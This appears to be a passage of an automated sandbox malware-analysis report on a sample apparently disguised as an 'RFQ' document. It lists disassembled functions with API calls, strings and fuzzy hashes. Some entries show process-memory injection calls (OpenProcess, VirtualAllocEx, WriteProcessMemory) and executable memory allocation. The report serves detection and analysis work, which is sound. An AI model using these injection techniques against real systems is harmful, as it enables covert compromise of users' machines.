Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28

Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB

__swprintf.LIBCMT ref: 00412ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: d816198c3568ef975599dd0e3500cea9c1fd863123ddcbb9d6b59a78db21c7ba
Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
Opcode Fuzzy Hash: d816198c3568ef975599dd0e3500cea9c1fd863123ddcbb9d6b59a78db21c7ba
Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A

Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE

Strings

AutoIt3GUI, xrefs: 0045B436
Container, xrefs: 0045B43B
%I, xrefs: 0045B561

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%I
API String ID: 3565006973-4251005282
Opcode ID: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
Opcode Fuzzy Hash: d6bd7f8a32bfb2d5055e0ae8304c5b8736a500a65d2c31c18350615f30b3fc21
Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4

Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004250AD

Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B

Strings

pow, xrefs: 00425085, 004250A2

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E

Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044862B
_memmove.LIBCMT ref: 00448685

Strings

3cA, xrefs: 0044860C
_A, xrefs: 004486FF, 0044DFDC, 0044DFF8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID: 3cA$_A
API String ID: 4104443479-3480954128
Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55

Function 004597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F

Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1

Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9

Strings

@, xrefs: 00459911

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5

Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499

Strings

SysMonthCal32, xrefs: 0048742C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4

Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70

Strings

Listbox, xrefs: 00486D08

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4

Function 0048770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794

Strings

msctls_trackbar32, xrefs: 00487749

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24

Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00426B93
__calloc_crt.LIBCMT ref: 00426BAC

Strings

K, xrefs: 00426BD1
@BL, xrefs: 00426BC3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __calloc_crt
String ID: K$@BL
API String ID: 3494438863-2209178351
Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C

Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23

Strings

kernel32.dll, xrefs: 00404C0C
Wow64DisableWow64FsRedirection, xrefs: 00404C1D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728

Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56

Strings

kernel32.dll, xrefs: 00404C3F
Wow64RevertWow64FsRedirection, xrefs: 00404C50

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728

Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07

Strings

advapi32.dll, xrefs: 00480DF0
RegDeleteKeyExW, xrefs: 00480E01

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28

Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100

Strings

kernel32.dll, xrefs: 004790E9
GetModuleHandleExW, xrefs: 004790FA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754

Function 00441714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00441718
__swprintf.LIBCMT ref: 00441749

Strings

%.3d, xrefs: 00441723
WIN_XPe, xrefs: 00441788

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E

Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94

Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0047E0BE
CharLowerBuffW.USER32(?,?), ref: 0047E101

Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
_memmove.LIBCMT ref: 0047E314

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
